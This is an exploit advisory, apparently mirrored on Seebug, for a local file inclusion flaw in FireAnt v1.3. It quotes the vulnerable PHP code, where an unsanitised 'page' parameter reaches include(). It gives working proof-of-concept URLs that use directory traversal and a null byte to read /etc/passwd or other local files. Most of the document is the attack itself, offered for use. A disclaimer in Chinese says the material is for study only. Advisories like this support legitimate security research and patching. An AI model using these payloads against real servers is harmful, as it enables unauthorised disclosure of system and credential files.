################################################################################### # # Name : FireAnt v1.3 Local File Inclusion Vulnerability # Author : cOndemned # Dork : use Your brain (: # Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;** # ################################################################################### Source : // index.php 8. $page = "bug_list"; //default page 9. if (!empty($_GET['page'])) { 10. $page = strip_tags($_GET['page']); 99. if (file_exists("./".$page.".php")) { 104. include("./".$page.".php"); Proof of Concept : http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00 http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论